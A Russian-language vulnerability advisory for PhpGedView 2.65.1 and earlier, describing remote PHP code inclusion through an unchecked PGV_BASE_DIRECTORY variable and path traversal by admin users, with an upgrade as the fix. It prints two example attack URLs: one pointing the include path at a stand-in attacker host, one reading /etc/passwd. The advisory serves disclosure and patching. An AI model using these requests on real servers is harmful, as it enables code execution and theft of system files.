Множественные уязвимости в PhpGedView

Дата публикации:
01.02.2004
Дата изменения:
17.10.2006
Всего просмотров:
824
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PhpGedView 2.x
Уязвимые версии: PhpGedView 2.65.1 и более ранние версии

Описание: Несколько уязвимостей обнаружено в PhpGedView. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целеовой системы. Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе.

Несколько сценариев (заканчивающихся '_conf.php') не проверяют данные, представленные пользователем в переменной $PGV_BASE_DIRECTORY. Пример:

http://[target]/[phpGedView-directory ]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/
Удаленный авторизованный пользователь с ”admin“ привилегиями может просматривать произвольные файлы на целевой системе. Пример:
http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd

URL производителя: http://phpgedview.sourceforge.net/

Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

Ссылки: PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

или введите имя

CAPTCHA